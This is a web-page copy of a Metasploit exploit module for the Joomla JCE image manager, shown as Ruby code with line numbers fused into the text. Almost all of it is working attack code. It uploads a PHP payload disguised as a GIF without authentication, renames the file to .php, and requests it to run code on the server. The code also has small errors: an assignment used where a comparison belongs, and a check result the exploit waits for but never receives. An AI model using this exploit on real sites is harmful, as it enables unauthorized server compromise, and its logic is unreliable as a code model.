Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::FileDropper1011def initialize(info = {})12super(update_info(info,13'Name' => 'Joomla Component JCE File Upload Remote Code Execution',14'Description' => %q{15This module exploits a vulnerability in the JCE component for Joomla!, which16could allow an unauthenticated remote attacker to upload arbitrary files, caused by the17fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP18request, a remote attacker could exploit this vulnerability to upload a malicious PHP19script, which could allow the attacker to execute arbitrary PHP code on the vulnerable20system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla211.5.26.22},23'Author' =>24[25'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC26'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module27],28'License' => MSF_LICENSE,29'References' =>30[31['OSVDB', '74839'],32['EDB', '17734'],33['BID', '49338']34],35'Payload' =>36{37'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)38'DisableNops' => true,39'BadChars' => "#",40'Keys' => ['php']41},42'Platform' => 'php',43'Arch' => ARCH_PHP,44'Targets' => [[ 'Automatic', { }]],45'Privileged' => false,46'DisclosureDate' => '2012-08-02',47'DefaultTarget' => 0))4849register_options(50[51OptString.new('TARGETURI', [true, "Joomla directory path", "/"])52])53end545556def get_version57# check imgmanager version58@uri_base = normalize_uri(target_uri.path.to_s, 'index.php')59@vars_get_base = {60'option'=> 'com_jce',61'task' => 'plugin',62'plugin'=> 'imgmanager',63'file' => 'imgmanager'64}65print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")66res = send_request_cgi({67'uri' => @uri_base,68'vars_get' => @vars_get_base,69'method' => 'GET',70'version' => '1.1'71})7273version = nil74if (res and res.code == 200)75res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})76version = $1.nil? ? nil : $177end7879return version80end8182def check83version = ( get_version || '').to_s8485if (version.match(%r{1\.5\.7\.1[0-4]?}))86return Exploit::CheckCode::Appears87end8889return Exploit::CheckCode::Safe90end919293def upload_gif94# add GIF header95cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"9697# Generate some random strings98@payload_name = rand_text_alpha_lower(6)99boundary = '-' * 27 + rand_text_numeric(11)100101parms = {'method'=> 'form'}102parms.merge!(@vars_get_base)103104# POST data105post_data = Rex::MIME::Message.new106post_data.bound = boundary107post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")108post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")109post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")110post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")111post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")112post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")113114data = post_data.to_s115116res = send_request_cgi({117'uri' => @uri_base,118'vars_get' => parms,119'method' => 'POST',120'version' => '1.1',121'data' => data,122'ctype' => "multipart/form-data; boundary=#{post_data.bound}"123})124125if (res and res.code = 200 )126return :access_denied if (res.body =~ /RESTRICTED/i)127print_good("Successfully uploaded #{@payload_name}.gif")128else129print_error("Error uploading #{@payload_name}.gif")130return :abort131end132133return :success134135end136137def renamed?138# Rename the file from .gif to .php139140data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"141142print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")143144res = send_request_cgi(145{146'uri' => @uri_base,147'vars_get' => @vars_get_base,148'method' => 'POST',149'version' => '1.1',150'data' => data,151'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',152'headers' =>153{154'X-Request' => 'JSON'155}156})157if (res and res.code == 200 )158print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")159return true160else161print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")162return false163end164end165166def call_payload167payload = "#{@payload_name}.php"168print_status("Calling payload: #{payload}")169uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)170res = send_request_cgi({171'uri' => uri,172'method' => 'GET',173'version' => '1.1'174})175end176177178179def exploit180181return if not check == Exploit::CheckCode::Vulnerable182if upload_gif == :success183if renamed?184register_files_for_cleanup("#{@payload_name}.php")185call_payload186end187end188189end190end191192193